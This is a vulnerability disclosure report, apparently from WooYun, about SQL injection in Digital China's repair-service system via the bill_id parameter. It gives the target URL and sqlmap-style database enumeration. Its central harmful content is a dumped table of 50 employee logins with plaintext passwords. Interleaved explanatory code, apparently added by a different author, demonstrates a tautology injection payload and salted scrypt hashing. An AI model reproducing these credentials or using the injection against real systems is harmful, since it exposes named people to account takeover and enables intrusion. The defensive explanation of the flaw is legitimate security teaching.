WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2015-09-10: Details sent to the vendor; awaiting vendor handling
2015-09-10: Vendor confirmed; details disclosed to the vendor only
2015-09-11: Vendor fixed the vulnerability and disclosed it proactively; details made public
As titled.
神州数码 (Digital China) repair service management system: the following link has a SQL injection, and the bill_id parameter is the injectable one.
http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191
11 databases were found.
Taking the U_DELL database as an example, there are tables with tens of millions of rows.
back-end DBMS: Oracle
Database: U_DELL
+-----------------------+----------+
| Table                 | Entries  |
+-----------------------+----------+
| OPT_LIST              | 22807944 |
| SER_RC_END            |  9989419 |
| EDI_DETAIL            |  5221963 |
| EDI_INVENTORY_TEMP_3S |  2814074 |
| REQ_LIST              |  1770091 |
| SER_BACK_CLASS        |  1703605 |
| REQ_INF               |  1614940 |
| BILL_INDEX            |  1606424 |
| T142_20_C             |  1592256 |
| SER_INDEX             |  1513885 |
| BILL_LIST_BAK         |  1459097 |
| SER_INF_BAK           |  1404593 |
| PART_LIST_BAK         |  1293696 |
| RMA_PICK_UP_BAK       |  1138502 |
+-----------------------+----------+
Taking the ERS database as an example, there are tables with millions of rows.
Database: ERS
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| LOGIN_LIST          | 4141728 |
| CUST                | 2718576 |
| PERSON_INF          | 2392669 |
| CCS_DELL_RESULT     | 1154633 |
| MAIL                | 1056855 |
| CCS_CASE            |  854095 |
| ORGNIZATION_PROFILE |  316973 |
| CCS_AD_BILL         |  260222 |
| CCS_AD_OPT_LOG      |  116561 |
| DAY_LIST            |   10000 |
+---------------------+---------+
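As an added illustration of the bug class behind the bill_id finding (this is not code from the report or from the vendor's system), here is a bill lookup that concatenates the request parameter into the SQL string, beside the same lookup done with a bind parameter and a format allow-list. The table, column names, sample rows and the bill-id regex are constructed assumptions modelled on the sample value D506184191; sqlite3 stands in for the Oracle backend so the block runs offline (Oracle drivers such as cx_Oracle/python-oracledb use `:name` placeholders rather than `?`).

```python
import re
import sqlite3

# Assumption: the page behind snap_sdar.asp concatenated bill_id into its SQL
# string, which is the usual root cause of this bug class. The regex below is
# an assumption derived from the one sample value on the page (D506184191).
BILL_ID_RE = re.compile(r"^[A-Z][0-9]{9}$")


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in table with constructed rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE bills (bill_id TEXT PRIMARY KEY, customer TEXT, status TEXT)"
    )
    conn.executemany(
        "INSERT INTO bills VALUES (?, ?, ?)",
        [
            ("D506184191", "customer-a", "closed"),
            ("D506184192", "customer-b", "open"),
            ("D506184193", "customer-c", "open"),
        ],
    )
    return conn


def is_valid_bill_id(bill_id: str) -> bool:
    """Allow-list check on the parameter's shape (defence in depth only)."""
    return BILL_ID_RE.fullmatch(bill_id) is not None


def lookup_bill_vulnerable(conn: sqlite3.Connection, bill_id: str) -> list:
    """String concatenation: the parameter becomes part of the SQL grammar."""
    sql = (
        "SELECT bill_id, customer, status FROM bills WHERE bill_id = '"
        + bill_id
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_bill_safe(conn: sqlite3.Connection, bill_id: str) -> list:
    """Bind parameter: the input is always a string value, never SQL text.

    The allow-list rejects malformed ids early; the bind parameter is the
    actual fix and would be sufficient on its own.
    """
    if not is_valid_bill_id(bill_id):
        return []
    sql = "SELECT bill_id, customer, status FROM bills WHERE bill_id = ?"
    return conn.execute(sql, (bill_id,)).fetchall()


# Classic boolean-based probe: close the string literal, append a tautology.
INJECTED = "D506184191' OR 'a'='a"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", len(lookup_bill_vulnerable(db, INJECTED)), "rows")
    print("safe:      ", len(lookup_bill_safe(db, INJECTED)), "rows")
```

With the tautology payload the concatenating version returns every row in the table, which is exactly the condition sqlmap detects and then turns into full dumps like the ones above; the bound version returns nothing for the same input.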
The leaked account information includes usernames, passwords and so on. The passwords are actually stored in plaintext; I'm speechless.
Database: ERS
Table: DIC_USERS
[50 entries]
+---------+-------------+--------------+-----+-------------+----------------------+
| USER_ID | LOGIN_ID    | PASSWORD     | M1  | M2          | LAST_UPDATE_PWD_DATE |
+---------+-------------+--------------+-----+-------------+----------------------+
| 10140   | dc-fucx1    | zzzzzz1      | nec | dc-fucx1    | 2015-04-01 15:56:26  |
| 10141   | xa-songzy   | song123      | nec | xa-songzy   | 2009-10-09 09:38:18  |
| 10142   | bj-zhaoyan  | 885669       | nec | bj-zhaoyan  | 2001-01-01 00:00:00  |
| 10144   | dc-lyq      | 1qa23z       | nec | dc-lyq      | 2012-03-12 11:48:43  |
| 10145   | sh-kl       | 64661559kl   | nec | sh-kl       | 2011-09-07 18:27:12  |
| 10146   | bj2-yzy     | yzy          | nec | bj2-yzy     | 2001-01-01 00:00:00  |
| 10147   | wh-lvyp     | lyp811214    | nec | wh-lvyp     | 2008-12-15 10:10:58  |
| 10148   | sy-huanghai | huanghai     | nec | sy-huanghai | 2001-01-01 00:00:00  |
| 10149   | bj-libr     | libr         | nec | bj-libr     | 2001-01-01 00:00:00  |
| 10150   | bj-liujd    | 12345        | nec | bj-liujd    | 2001-01-01 00:00:00  |
| 10151   | xa-liwq     | 123456l      | nec | xa-liwq     | 2015-04-01 14:24:12  |
| 10152   | dc-syl      | enter        | nec | dc-syl      | 2001-01-01 00:00:00  |
| 10153   | bj-lj       | lijiae1      | nec | bj-lj       | 2009-10-09 10:58:50  |
| 10154   | bj-fuqh     | fuqh         | nec | bj-fuqh     | 2001-01-01 00:00:00  |
| 10155   | dc-zb       | zhaobin7879  | nec | dc-zb       | 2014-06-16 17:59:19  |
| 10156   | nj-zt       | nj           | nec | nj-zt       | 2001-01-01 00:00:00  |
| 10157   | bj-fanyj    | blfiqpgf     | nec | bj-fanyj    | 2001-01-01 00:00:00  |
| 10158   | bj-jl       | akuma820809  | nec | bj-jl       | 2001-01-01 00:00:00  |
| 10159   | bj2-jl      | akuma820809  | nec | bj2-jl      | 2001-01-01 00:00:00  |
| 10160   | bj2-mn      | maning122802 | nec | bj2-mn      | 2013-02-21 14:29:31  |
| 10161   | bj2-fyj     | 198000       | nec | bj2-fyj     | 2001-01-01 00:00:00  |
| 10162   | bj-xzm      | xzm          | nec | bj-xzm      | 2001-01-01 00:00:00  |
| 10163   | sh-zxl      | zxl321       | nec | sh-zxl      | 2015-04-03 14:39:05  |
| 10164   | bj-zhy      | zhy123       | nec | bj-zhy      | 2013-07-08 09:16:43  |
| 10165   | dc-cc       | dccc800      | nec | dc-cc       | 2015-06-26 09:25:13  |
| 10166   | bj-lbw      | 5211314      | nec | bj-lbw      | 2001-01-01 00:00:00  |
| 10167   | sh-lx       | anad0728     | nec | sh-lx       | 2015-05-08 18:08:50  |
| 10168   | dc-sqj      | 13301353150  | nec | dc-sqj      | 2001-01-01 00:00:00  |
| 10170   | dc-wwj      | 0606wwj      | nec | dc-wwj      | 2011-09-14 09:42:55  |
| 10171   | dc-wg       | newpass123x  | nec | dc-wg       | 2013-09-23 15:13:00  |
| 10173   | bj-hxq      | hxq000       | nec | bj-hxq      | 2015-01-23 09:20:29  |
| 10175   | sh-zsy      | tos901       | nec | sh-zsy      | 2014-05-13 16:15:57  |
| 10176   | wh-lly      | asd321       | nec | wh-lly      | 2014-03-28 12:35:06  |
| 10177   | sz-tzy      | NONE         | nec | sz-tzy      | 2001-01-01 00:00:00  |
| 10178   | bj-ty       | ty19710401   | nec | bj-ty       | 2008-12-31 15:16:16  |
| 10179   | bj-ln       | 1234         | nec | bj-ln       | 2001-01-01 00:00:00  |
| 10180   | bj-mn       | 19810802     | nec | bj-mn       | 2001-01-01 00:00:00  |
| 10181   | bj-wl       | 741852pp     | nec | bj-wl       | 2013-07-04 18:44:50  |
| 10182   | bj-jxl      | ooo          | nec | bj-jxl      | 2001-01-01 00:00:00  |
| 10183   | dc-nw       | 781029       | nec | dc-nw       | 2001-01-01 00:00:00  |
| 10184   | jn-zl       | 123asd       | nec | jn-zl       | 2009-10-16 15:38:12  |
| 10185   | nj-zxy      | zxy          | nec | nj-zxy      | 2012-07-05 14:19:53  |
| 10186   | dc-zhuhj    | aaa111       | nec | dc-zhuhj    | 2014-06-06 11:21:41  |
| 10187   | dc-niewei   | 456          | nec | dc-niewei   | 2001-01-01 00:00:00  |
| 10188   | nec-jzq     | nec12345     | nec | nec-jzq     | 2009-01-05 13:57:29  |
| 10189   | 10189       | lizhb2009    | nec | cd-zhouzh   | 2010-09-21 18:17:24  |
| 10190   | nec-zq      | nec111       | nec | nec-zq      | 2009-03-12 17:55:26  |
| 10191   | nec-zgyj    | 11111        | nec | nec-zgyj    | 2001-01-01 00:00:00  |
| 10192   | nec-hy      | 12345678     | nec | nec-hy      | 2001-01-01 00:00:00  |
| 10193   | dc-yangqian | 42yangqian   | nec | dc-yangqian | 2014-07-15 11:35:09  |
+---------+-------------+--------------+-----+-------------+----------------------+
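The DIC_USERS dump shows the PASSWORD column holding the user's password as typed, so a single injection turns a database read into a full set of working logins. As an added example, not the vendor's code, this is the storage format that should have been there: a per-user random salt and a memory-hard hash (scrypt from Python's hashlib), a constant-time verify, and a one-shot migration of plaintext rows. The sample rows and the scrypt parameters are constructed assumptions, not values from the page.

```python
import hashlib
import hmac
import os

# Assumed work factors (not from the page): 16 MiB of memory per hash, which
# is a reasonable interactive-login baseline. Raise N as hardware allows.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32

# Constructed rows shaped like the dump's (LOGIN_ID, PASSWORD) pairs; not real users.
SAMPLE_ROWS = [("branch-user1", "zzzzzz1"), ("branch-user2", "hunter2x")]


def hash_password(password: str, salt: bytes = None) -> str:
    """Return 'scrypt$N$r$p$salt_hex$hash_hex' with a fresh 16-byte salt.

    Storing the parameters alongside the hash lets them be raised later
    without breaking verification of older records.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.scrypt(
        password.encode("utf-8"), salt=salt,
        n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN,
    )
    return "$".join(
        ["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P), salt.hex(), digest.hex()]
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the parameters in the record; compare in constant time."""
    try:
        algo, n, r, p, salt_hex, hash_hex = stored.split("$")
        if algo != "scrypt":
            return False
        digest = hashlib.scrypt(
            password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
            n=int(n), r=int(r), p=int(p), dklen=len(hash_hex) // 2,
        )
    except ValueError:
        return False  # malformed record (e.g. a leftover plaintext value)
    return hmac.compare_digest(digest.hex(), hash_hex)


def migrate_plaintext_rows(rows) -> dict:
    """Replace each (LOGIN_ID, plaintext) pair with a hash record.

    Only safe because the plaintext is available once, during migration;
    afterwards the plaintext column must be dropped, not kept 'for reference'.
    """
    return {login_id: hash_password(plaintext) for login_id, plaintext in rows}


if __name__ == "__main__":
    records = migrate_plaintext_rows(SAMPLE_ROWS)
    for login_id, plaintext in SAMPLE_ROWS:
        print(login_id, verify_password(plaintext, records[login_id]), records[login_id][:40])
```

Two rows in the dump share the password akuma820809 and many use trivial values; with a random salt per user, equal passwords still produce different records, so a dump no longer reveals which accounts share credentials, and the cost of scrypt makes offline guessing of the weak ones materially slower than it is against plaintext.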
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-09-10 11:05
Please handle this as soon as possible!
2015-09-11: Fixed.